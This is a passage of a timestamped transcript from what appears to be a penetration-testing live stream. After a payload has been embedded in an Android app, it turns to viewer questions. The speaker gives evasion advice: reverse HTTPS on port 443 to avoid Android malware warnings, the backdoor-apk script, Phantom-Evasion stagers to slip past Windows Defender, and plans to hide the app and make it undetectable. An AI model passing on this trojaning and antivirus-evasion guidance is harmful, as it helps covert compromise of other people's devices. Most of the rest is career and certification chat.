signed, that is something to take into consideration. But we have successfully embedded the payload
309
00:31:40,320 --> 00:31:45,600
within the Android application. So now that we've embedded it, whenever we launch this application,
310
00:31:45,600 --> 00:31:51,120
and because it is a launcher, it will constantly be active. And whenever the main activity is
311
00:31:51,120 --> 00:31:56,640
triggered, we will get our payload session. Now, the other videos that I want to make is we need
312
00:31:56,640 --> 00:32:01,440
to obfuscate, we need to focus on obfuscation, because that is primarily going to be how you
313
00:32:01,440 --> 00:32:06,000
get the application on a particular device. And then the other one is persistence through either
314
00:32:06,000 --> 00:32:11,840
creating a script. And of course, that's going to depend on creating a persistent script,
315
00:32:11,840 --> 00:32:15,600
essentially getting the application to run. And then finally, the video I'll be making last is
316
00:32:15,600 --> 00:32:21,840
how to hide the application from the application drawer. Alright, so that's pretty much what I'm
317
00:32:21,840 --> 00:32:27,200
going to be covering for this live stream. I know you guys wanted me to cover quite a bit more,
318
00:32:27,200 --> 00:32:31,760
but that's all I have time for. And I'll be making the other videos following up. So my next video
319
00:32:31,760 --> 00:32:37,280
on Android will be signing the application, then making it fully undetectable as best as possible.
320
00:32:37,280 --> 00:32:43,120
But for those of you who are curious, you can also use the backdoor-apk, the backdoor-apk script.
321
00:32:43,120 --> 00:32:48,720
So yeah, I know Mike telling me to change my ISP. Yes, I am working on that.
322
00:32:52,000 --> 00:32:55,840
Thanks, bro, for this video. Yes, this video will be available after the stream.
323
00:32:57,040 --> 00:33:02,320
Can we do it to any apps above 10 megabytes? Yes, you can do it to most of the applications.
324
00:33:02,320 --> 00:33:06,960
But again, it's all about how the application was developed. If the application was developed
325
00:33:07,680 --> 00:33:14,240
differently than in the sense that they have various renaming for the activities for the
326
00:33:14,240 --> 00:33:17,680
main activities, then you pretty much will have some errors.
327
00:33:21,280 --> 00:33:27,360
We have a message from photo slash Hey, no wait, want to see it in action, you'll see it in action
328
00:33:27,360 --> 00:33:31,920
in the next video, I'll use the exact same application. And I'll show you what happens
329
00:33:31,920 --> 00:33:36,160
when you try and install it directly on the latest version of Android, which is Android 9,
330
00:33:36,640 --> 00:33:41,920
what will happen on Android 9 is it'll actually warn you that the application is malicious.
331
00:33:41,920 --> 00:33:45,760
And that's primarily because we're using the reverse TCP payload, if we were using
332
00:33:46,640 --> 00:33:55,200
the reverse HTTP or HTTPS, and with port 443, then that should potentially avoid detection.
333
00:33:55,200 --> 00:34:00,800
But again, obfuscation will be quite important. Alright, so I'll answer a few more questions.
334
00:34:01,600 --> 00:34:06,160
And end the stream here. So again, I really, really appreciate you guys watching the stream.
335
00:34:09,040 --> 00:34:12,400
Are you from Kenya? Yes, I am in Kenya majority of the time for work.
336
00:34:23,200 --> 00:34:29,520
Let's see, how do I feel about the use of ADB shell? ADB is very, very powerful. I'm guessing
337
00:34:29,520 --> 00:34:34,320
you're talking about forensics, right? Not too sure. Just give me a bit more
338
00:34:34,320 --> 00:34:46,640
information. No more questions. You can use the hackersploit tag so I can see your message a bit
339
00:34:46,640 --> 00:34:56,000
more clearly. Yes, I've heard of West Parklands. I'm not sure West Parklands, but I know about
340
00:34:56,000 --> 00:35:07,760
Parklands. Let's see. What's my career? I mentioned this previously, I'm a network penetration tester.
341
00:35:11,440 --> 00:35:15,120
Yeah, we'll also cover sharing methods. Um, yeah, I will do. I'm guessing you're talking
342
00:35:15,120 --> 00:35:19,760
about social engineering. What are my qualifications? Well, I am a penetration
343
00:35:19,760 --> 00:35:26,560
tester. So I have Network+, Linux+, and OSCP. Those are my professional certifications.
344
00:35:31,360 --> 00:35:37,920
Yeah, per and I, Kalita, how to make it fully undetectable. Yes, I will be making a
345
00:35:37,920 --> 00:35:42,960
video on that. That is a very, again, very, very tricky. And it does involve a bit of manual work.
346
00:35:42,960 --> 00:35:48,480
So the scripts really don't work nowadays. Thanks for enjoy your day. Love your channel.
347
00:35:48,640 --> 00:35:52,400
From Ethiopia. Thank you very much. Love to Ethiopia. I appreciate your support.
348
00:36:07,520 --> 00:36:09,680
The videos are going to come daily as I mentioned.
349
00:36:13,120 --> 00:36:16,880
You can go over port forwarding. Yes, I am going to make a video on port forwarding,
350
00:36:16,880 --> 00:36:21,040
manual port forwarding. Do I have a course on Udemy? Yes, I have one. As I said, we are
351
00:36:21,040 --> 00:36:26,960
migrating our courses onto the Hackersploit Academy, which is at hackersploit.io.
352
00:36:33,440 --> 00:36:38,320
I've been doing my CEH certification. What is my best scope? I am guessing your best
353
00:36:38,320 --> 00:36:42,000
opportunities. That's what you mean. Are there very many opportunities you can become?
354
00:36:42,960 --> 00:36:48,560
You can become a penetration tester. You can work in forensics. You can do a lot of stuff with CEH.
355
00:36:53,760 --> 00:36:57,440
Have you tried Ghidra? Yes, I did try it. I had my one of my friends,
356
00:36:57,440 --> 00:37:00,560
who is a malware analyst and reverse engineer,
357
00:37:01,360 --> 00:37:04,400
make the video on the channel. I pretty much I think you've checked it.
358
00:37:04,400 --> 00:37:11,440
Is OSCP a bit hard? OSCP is all about practice, as far as I know. You should pretty much just
359
00:37:11,440 --> 00:37:18,720
practice VulnHub. I'll be also making a series on the OSCP prep, the prep machines for VulnHub.
360
00:37:19,600 --> 00:37:28,240
Do I use Termux? Yes, I do use Termux. Greetings to Russia.
361
00:37:28,320 --> 00:37:32,640
Thank you very much for joining the stream, even though I'm pretty much going to be ending it in a
362
00:37:32,640 --> 00:37:42,160
few minutes. We'll be releasing our courses on Hackersploit Academy this weekend. Apologies for
363
00:37:42,160 --> 00:37:46,880
that. Let me just re let me just open up my virtual machine right over here.
364
00:37:47,360 --> 00:37:51,840
Here's malware analysis stuff. I wouldn't say it's tough. I think it's just really exciting
365
00:37:51,840 --> 00:37:56,000
and very, very different for each piece of malware you start working with.
366
00:37:57,200 --> 00:38:03,200
Ford Mustafa, thank you so much from Canada. Thank you. Glad you enjoyed the video.
367
00:38:17,520 --> 00:38:22,640
Greetings from Poland. Love from India. Thank you very much. I appreciate it.
368
00:38:25,600 --> 00:38:28,720
You guys can post any other questions you have left because I'm really
369
00:38:28,720 --> 00:38:31,840
strapped for time at the moment. So if you have any important questions, go ahead.
370
00:38:36,240 --> 00:38:41,120
Let's see. How many ears do you have? I have two ears.
371
00:38:41,120 --> 00:38:48,080
Yes, I have videos on ARP spoofing. You can check my channel, just search for
372
00:38:48,080 --> 00:38:50,560
Hackersploit ARP spoofing. You should find the video.
373
00:38:59,760 --> 00:39:02,080
What do I think of Ghidra? It's a very good tool.
374
00:39:04,960 --> 00:39:08,720
Ghidra I think is just very different than what anyone has ever used before. So again,
375
00:39:08,720 --> 00:39:11,760
it's just about getting used to it.
376
00:39:15,280 --> 00:39:21,360
Tips on OSCP: learn post-exploitation, learn file transfers between Linux,
377
00:39:21,360 --> 00:39:28,240
Linux boxes and Linux and Windows boxes. Learn about exploit modification. That's very,
378
00:39:28,240 --> 00:39:36,880
very important. Binary CTF? Yeah, a lot of CTF videos coming up. I have a few of the CTF
379
00:39:36,880 --> 00:39:46,000
challenges. I'm also going to be doing Hack The Box live. The next hosting for Metasploit with
380
00:39:46,000 --> 00:39:52,480
all ports open. I'm as I said, I'm going to do manual port forwarding. I'll also show you
381
00:39:52,480 --> 00:40:05,920
how to use the No-IP port forwarding. Live in Kenya also you like you in Great Wall Garden. I'm
382
00:40:05,920 --> 00:40:16,640
not sure what that means. Is it necessary to be grad or self learned or to be a graduate of
383
00:40:16,640 --> 00:40:20,960
self learned? Have a good scope. I think just having experience in what and being good in
384
00:40:20,960 --> 00:40:28,720
what you do really good really goes a long way. You can reach me life of a hacker you can reach
385
00:40:28,720 --> 00:40:34,000
me via my email. My email is always linked in the community section of the channel or
386
00:40:34,000 --> 00:40:41,440
hackersploit at gmail.com. That's my public Gmail address that I use. Am I an Avenger,
387
00:40:41,440 --> 00:40:46,720
an Avenger fan? No, sadly, I'm not. I really haven't been watching any of the latest movies.
388
00:40:46,720 --> 00:41:00,320
So apologies. Davide Carlissof. Hi from Italy. Hello. You sound like Mufti Menk. Yes, I've got
389
00:41:00,320 --> 00:41:06,640
that a lot. I actually do watch some of his videos. Sometimes on Facebook, when I do get sent those
390
00:41:06,640 --> 00:41:14,240
videos telling me that I do sound like him. So yeah, I guess so. ngrok. Yeah, I've made a video
391
00:41:14,240 --> 00:41:23,840
on ngrok. You can check that out as well. That's very, very good. Eugene Lihasi. Hi from Kenya.
392
00:41:23,840 --> 00:41:29,120
Hello. Did I use PowerShell? No, I did not use PowerShell. I just have a different theme for
393
00:41:29,120 --> 00:41:38,160
my terminal. Hello from Morocco. Hello. Any video about Empire? Yes, I'm making videos about
394
00:41:38,160 --> 00:41:41,680
Android first, then I'll move on to using Cobalt Strike and Empire.
395
00:41:44,880 --> 00:41:48,720
Sorry, many of you guys want me to look at the camera when answering the questions. I'll do
396
00:41:48,720 --> 00:41:55,840
that again. Who writes my articles? I write them personally at the moment. Hi from Hungary. Hello.
397
00:41:59,120 --> 00:42:07,120
Mubasher Assad. Yes, there isn't a course yet. We are releasing this weekend, as I mentioned,
398
00:42:07,120 --> 00:42:14,640
our first courses. What version of Linux are you using? I'm using Linux, Kali Linux 2019.1.
399
00:42:18,320 --> 00:42:26,000
Any tips to follow before scoring well in the CEH exam? I guess just read up on your notes or read
400
00:42:26,000 --> 00:42:31,920
up on the handbook. It should be a multiple choice question. CEH was pretty simple for me.
401
00:42:31,920 --> 00:42:39,600
It shouldn't be a difficult exam at all. Have a good day. God bless. God bless you too.
402
00:42:41,520 --> 00:42:47,600
Can you make more videos on Veil? Yes, I will make more videos on Veil-Evasion. I believe I have
403
00:42:47,600 --> 00:42:55,200
before, but I will follow them up. The problem with Veil is whether you're using, for example,
404
00:42:55,200 --> 00:43:01,040
if I use an encoder with MSF Venom like shikata_ga_nai for Windows. Most of the time,
405
00:43:01,040 --> 00:43:05,200
if you're working with Windows 10, because they have Windows Defender constantly updated with the
406
00:43:05,200 --> 00:43:16,400
latest signatures, it pretty much will not work or will be detected. My ISP doesn't support port
407
00:43:16,400 --> 00:43:22,240
forwarding. Why is that? Hands asking for hosting with all ports or particular ports. Do you have
408
00:43:22,240 --> 00:43:29,760
access to your main router? Love from South Korea. Same here. Love to South Korea.
409
00:43:31,840 --> 00:43:36,560
Have I hacked anyone? No, I haven't hacked anyone. Do bug bounty? Do you do bug? Yes,
410
00:43:36,560 --> 00:43:48,080
I do do some bug bounty on bug crowd. What will I do today? I've already recorded or I've already
411
00:43:48,080 --> 00:43:57,760
live streamed the recording of what I wanted to do. We have a good question from James Moreno.
412
00:43:58,480 --> 00:44:05,440
Advice, please. I have a bachelor of science in information systems. That's a good start,
413
00:44:05,440 --> 00:44:09,360
a very good start. And I want to get into pen testing. Where should I go from here? I would
414
00:44:09,360 --> 00:44:14,160
recommend taking the network plus certification as always do. If you don't want to, that's fine. It
415
00:44:14,160 --> 00:44:19,840
just gives you great information to begin with before you go into anything like OSCP. I definitely
416
00:44:19,840 --> 00:44:27,920
recommend going for OSCP, Security+ and PenTest+ as well, which is one of the
417
00:44:27,920 --> 00:44:34,400
latest certifications. CEH is also very, very good if you want an introduction into cyber security.
418
00:44:34,400 --> 00:44:44,640
I can make a detailed video on OSCP tips and bug bounty videos. Yes, I'm going to be showing
419
00:44:44,640 --> 00:44:50,320
you guys what environment I've set up for bug bounty videos. Have I got paid for any bugs? Yes,
420
00:44:50,320 --> 00:44:57,280
I've got paid for three bugs in my lifetime. I think the total to about maybe $800. So not
421
00:44:57,280 --> 00:45:03,120
any big bugs particularly. But again, it's just that I don't have the time for bug bounty. But
422
00:45:03,120 --> 00:45:29,040
when I do, I usually try it out. Greetings to Ukraine. Wismaster got it correct in many of
423
00:45:29,040 --> 00:45:35,440
the issues with port forwarding are because of NAT, NAT configurations. And if your ISP is
424
00:45:36,160 --> 00:45:42,800
particularly doing it connected internet to your entire building, that is a common syndrome.
425
00:45:46,560 --> 00:45:50,720
What's the best way to get your payloads undetectable by Windows Defender? Well,
426
00:45:50,720 --> 00:45:55,040
I've been working or I've been taking a look at one of these scripts here. I don't know if I can
427
00:45:55,040 --> 00:45:59,920
just show you this. I was planning to make a video on it. It is the Phantom-Evasion tool.
428
00:45:59,920 --> 00:46:06,160
Phantom-Evasion tool allows you here if I can just launch it. Yeah, let me just launch it.
429
00:46:06,160 --> 00:46:15,040
python phantom-evasion.py. So let me just start this up here. Phantom-Evasion allows you to
430
00:46:15,040 --> 00:46:20,400
generate various stages here. So I'll show you this right now. So you have your C,
431
00:46:20,400 --> 00:46:24,400
meterpreter stager. I'll get to that. So in your Windows modules,
432
00:46:25,360 --> 00:46:28,640
you have your shellcode injection, you have your stages. So if you're looking for stages,
433
00:46:28,640 --> 00:46:33,600
which I'm guessing you are, you can find them right over here. So if you're on your 64 bit stages,
434
00:46:33,600 --> 00:46:39,440
you have your reverse TCP virtual unlock, which works great if you are looking particularly to
435
00:46:42,800 --> 00:46:47,680
essentially prevent detection by Windows Defender. I would recommend these stages modules here.
436
00:46:50,400 --> 00:47:03,120
What is my opinion about eLearnSecurity? I haven't consumed any of their courses yet,
437
00:47:03,120 --> 00:47:06,480
but I'll definitely try them out. They look like they have very, very good courses.
438
00:47:11,120 --> 00:47:15,600
How do you let the terminal continue suggestions? I think you're talking about auto completion.
439
00:47:15,600 --> 00:47:20,480
That is the tab based on the current file structure, or whether or not you have the
440
00:47:20,480 --> 00:47:25,040
file in that particular directory. So just use your tab key, and that should auto complete for
441
00:47:25,040 --> 00:47:35,280
you to the nearest approximation. Yes, you can and I do recommend using reverse HTTP on Android,
442
00:47:35,280 --> 00:47:43,520
because you can make it sort of undetectable by essentially monitoring
443
00:47:43,520 --> 00:47:48,240
the traffic coming from the application because everything will be going to and from port 443.
444
00:48:01,920 --> 00:48:07,360
Graham Hughes, good day from Australia. Same to you, sir. How are you guys doing over there?
445
00:48:08,320 --> 00:48:14,640
How to start malware analysis? That's a good question. A lot of things to cover. I'll probably
446
00:48:14,640 --> 00:48:17,200
have to make an introduction video to that as well because
447
00:48:20,240 --> 00:48:27,680
Rakesh Sharma asks me, are the courses by Pentester Academy? I believe you're talking about Vivek.
448
00:48:27,680 --> 00:48:35,680
Yes, they're really good courses. Apologies, one of my Android devices here is giving me
449
00:48:36,000 --> 00:48:45,040
notifications. Sorry about that. Hello, Imran. It's good seeing you as well. It's been a long
450
00:48:45,040 --> 00:48:53,440
time. How are you? How are you doing? Oh, nice. Sorry about that, Hughes. I didn't see that at
451
00:48:53,520 --> 00:48:57,360
6:23 am. Yep, that's definitely Australia.
452
00:49:04,640 --> 00:49:10,000
Eric Risco, I liked your recent collab with IT Career Questions. Yes, I just made the video
453
00:49:10,000 --> 00:49:16,880
yesterday. Very, very good questions. You can check that out as well. I have about one minute
454
00:49:16,880 --> 00:49:31,200
left to ask you questions. So go ahead and shoot. Do you know any RAT with EternalBlue exploit? I'm
455
00:49:31,200 --> 00:49:36,880
not sure what you mean by that remote access tool, usually as the payload and then which you install
456
00:49:36,880 --> 00:49:41,440
on the client and then you have the server sitting on the server really. So I'm guessing
457
00:49:41,440 --> 00:49:45,200
you're talking about the exploit, the actual exploit is getting the payload installed. So
458
00:49:45,200 --> 00:49:49,680
you can consider the EternalBlue exploit a form of a remote access tool. However,
459
00:49:49,680 --> 00:49:52,240
remote access tool does give you more functionality.
460
00:49:55,680 --> 00:50:00,000
Wi-Fi pen test. Yes, I have videos on that, you can check out my the playlist. I have
461
00:50:00,000 --> 00:50:02,240
the WPA2 penetration testing videos.
462
00:50:11,120 --> 00:50:14,320
Life of a hacker. I think I'm going to send a notification on your phone. Let me check
463
00:50:15,520 --> 00:50:21,360
Um, I don't think it got any other emails here. Anyway, that's that's that.
464
00:50:28,160 --> 00:50:31,040
Antoine, you from India? No, I'm not from India.
465
00:50:33,200 --> 00:50:37,360
Although India is a pretty cool place. I would love to visit one,
466
00:50:37,360 --> 00:50:41,200
one time. It looks like a really, really interesting place culturally.
467
00:50:45,200 --> 00:50:58,720
Do I earn from YouTube? Yes, the channel is monetized to a certain extent. But again,
468
00:50:58,720 --> 00:51:03,360
because of the limitations in regards to the videos that I can monetize, I don't earn a lot
469
00:51:03,360 --> 00:51:09,760
are really just goes into the hosting and stuff like that. Yeah, I'll definitely check on your
470
00:51:09,760 --> 00:51:20,080
message out a life of a hacker. Thank you very much, Krishna. I appreciate it.
471
00:51:20,080 --> 00:51:40,240
It found bugs in which I believe I found a bug in. Well, that was actually a free bug bounty,
472
00:51:40,240 --> 00:51:45,120
or actually got I think the community score that was the first site that I got a bounty
473
00:51:46,080 --> 00:51:52,320
on was Humble Bundle, which, as you already know, is a site that has all of these bundles,
474
00:51:52,320 --> 00:51:59,520
which I am to do a giveaway on by the way, I then I believe it was a startup company that a video
475
00:51:59,520 --> 00:52:06,000
platform that I found the second bug, it was remote code execution, I believe I'll have to
476
00:52:06,000 --> 00:52:11,200
actually post all of these exact details in regards to the bounties.
477
00:52:15,120 --> 00:52:35,920
Now this channel has been on YouTube for about three years now. The exploit application has been
478
00:52:35,920 --> 00:52:40,800
inactive now because it was kicked off the Google Play Store, sadly, because of the content that it
479
00:52:40,800 --> 00:52:49,600
has. Google has really, really strict community guidelines now. I would recommend getting the
480
00:52:49,600 --> 00:52:55,440
CEH first if you are interested in it and then get the OSCP. You have Security+, that's pretty cool.
481
00:52:55,440 --> 00:53:14,000
Also, my hacking machine setup, I don't have a dedicated setup, but I do have an environment
482
00:53:14,000 --> 00:53:21,120
that I do create with. I do have a collection of tools that I do use constantly. So I'll probably
483
00:53:21,120 --> 00:53:25,120
make a video on that. Yes, the video will be uploaded when the broadcast is complete.
484
00:53:32,320 --> 00:53:35,200
All right, I'll just be here for a few more seconds now.
485
00:53:45,280 --> 00:53:47,440
Yeah, I think I'll pretty much end the video here.
486
00:53:47,840 --> 00:53:51,600
Thank you very much, guys, for joining me on the stream. I really, really appreciate it.
487
00:53:51,600 --> 00:53:56,560
Let me just answer one more question. How to act the same network without using payload.
488
00:53:56,560 --> 00:54:01,520
I'm not sure what you mean and what devices you're talking about. Car hacking videos. Yes,
489
00:54:01,520 --> 00:54:06,720
I am working on a large project on that, but that is going to involve OBD,
490
00:54:06,720 --> 00:54:11,280
the OBD connection to the vehicle, because that is the most common connector.
491
00:54:17,920 --> 00:54:22,080
Yeah. So thank you so much for watching the stream, guys. I really, really appreciate it.
492
00:54:22,080 --> 00:54:27,600
You can post any of your other questions on my social networks, or you can actually contact
493
00:54:27,600 --> 00:54:34,400
me on my forum, hackersplay.org. And yeah, I'll be seeing you guys later. So thank you so much.
494
00:54:34,400 --> 00:54:37,360
And yeah, peace.